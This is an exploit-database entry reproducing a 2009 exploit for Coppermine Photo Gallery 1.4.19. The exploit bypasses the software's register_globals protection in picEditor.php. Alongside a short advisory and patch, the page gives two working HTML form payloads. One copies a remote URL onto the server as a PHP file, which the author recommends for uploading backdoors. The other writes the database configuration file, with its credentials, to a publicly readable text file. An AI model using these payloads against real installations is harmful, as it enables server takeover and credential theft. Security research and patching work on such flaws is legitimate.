header-logo
Suggest Exploit
vendor:
Coppermine Photo Gallery
by:
Michael Brooks
7.5
CVSS
HIGH
Bypassing register_globals security
16
CWE
Product Name: Coppermine Photo Gallery
Affected Version From: 1.4.19
Affected Version To: 1.4.19
Patch Exists: YES
Related CWE: N/A
CPE: a:coppermine-gallery:coppermine_photo_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Coppermine Photo gallery – Remote PHP File Upload

The Coppermine Photo Gallery is vulnerable to a remote PHP file upload vulnerability due to a bypass of the anti-register_globals security. This vulnerability allows an attacker to upload malicious PHP files to the server, which can be used to gain access to the server. The vulnerability is present in version 1.4.19 of the Coppermine Photo Gallery and can be exploited by setting the register_globals parameter to 'on'. A patch is available to fix the vulnerability by unsetting all variables except for the superglobals.

Mitigation:

Upgrade to the latest version of Coppermine Photo Gallery and apply the patch to fix the vulnerability.
Source

Exploit-DB raw data:

Written By Michael Brooks
Special thanks to str0ke!


Coppermine Photo gallery - Remote PHP File Upload
Affects: v1.4.19
Homepage: http://coppermine-gallery.net/
5,239,057   downloads from sf.net!

For this attack we need register_globals=on .  The problem is that
the anti-register_globals security can be bypassed.

This is in /include/init.inc.php  starting on line 42:
$keysToSkip = array('_POST', '_GET', '_COOKIE', '_REQUEST', '_SERVER', 'HTML_SUBST');
//...
        if (is_array($_POST)) {
                foreach ($_POST as $key => $value) {
                        if (!is_array($value))
                                $_POST[$key] = strtr($value, $HTML_SUBST);
                        if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
                }
        }

        if (is_array($_GET)) {
                foreach ($_GET as $key => $value) {
                        unset($_GET[$key]);
                        $_GET[strtr(stripslashes($key), $HTML_SUBST)] = strtr(stripslashes($value), $HTML_SUBST);
                        if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
                }
        }

        if (is_array($_COOKIE)) {
                foreach ($_COOKIE as $key => $value) {
                        if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
                }
        }
        if (is_array($_REQUEST)) {
                foreach ($_REQUEST as $key => $value) {
                        if (!is_array($value))
                                $_REQUEST[$key] = strtr($value, $HTML_SUBST);
                        if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
                }
        }
	//...
	
Here is a patch that will take care of register_globals.
if(ini_get(register_globals)){
	foreach(get_defined_vars() as $var=>$val){
		//only keep superglobals we need on this whitelist,  _SESSION will take care of its self:
		if(!in_array($var,array('_POST', '_GET', '_COOKIE', '_REQUEST', '_SERVER'))){
			unset($$var);
		}
	}
}


These 2 exploits are written in HTM,   but they are NOT XSRF!  This is
a global variable manipulation issue,  you can exploit this with CURL
or whatever.

This will copy www.google.com  to
http://127.0.0.1/cpg1419/albums/test.php .  This is very useful for
uploading backdoors.
This is hijacking  a call to copy() so we need allow_url_fopen=On ,
which is default.
<html>
	<form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=http%3A%2F%2Fwww.google.com&CURRENT_PIC[filename]=/test.php"
method=post>
		<input name="save" value=1>
		<input name="keysToSkip" value=1>
		<input name="_GET" value=1>
		<input name="_REQUEST" value=1>
		<input type=submit>
	</form>
</html>


This request will copy the database connection info and make it readable here:
http://10.1.1.155/Audit/cpg1419/albums/dbinfo.txt
This attack works with allow_url_fopen=Off
<html>
	<form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=include/config.inc.php&CURRENT_PIC[filename]=/dbinfo.txt"
method=post>
		<input name="save" value=1>
		<input name="keysToSkip" value=1>
		<input name="_GET" value=1>
		<input name="_REQUEST" value=1>
		<input type=submit>
	</form>
</html>

# milw0rm.com [2009-01-29]

Navigation

Suggest Exploit

Services By CQR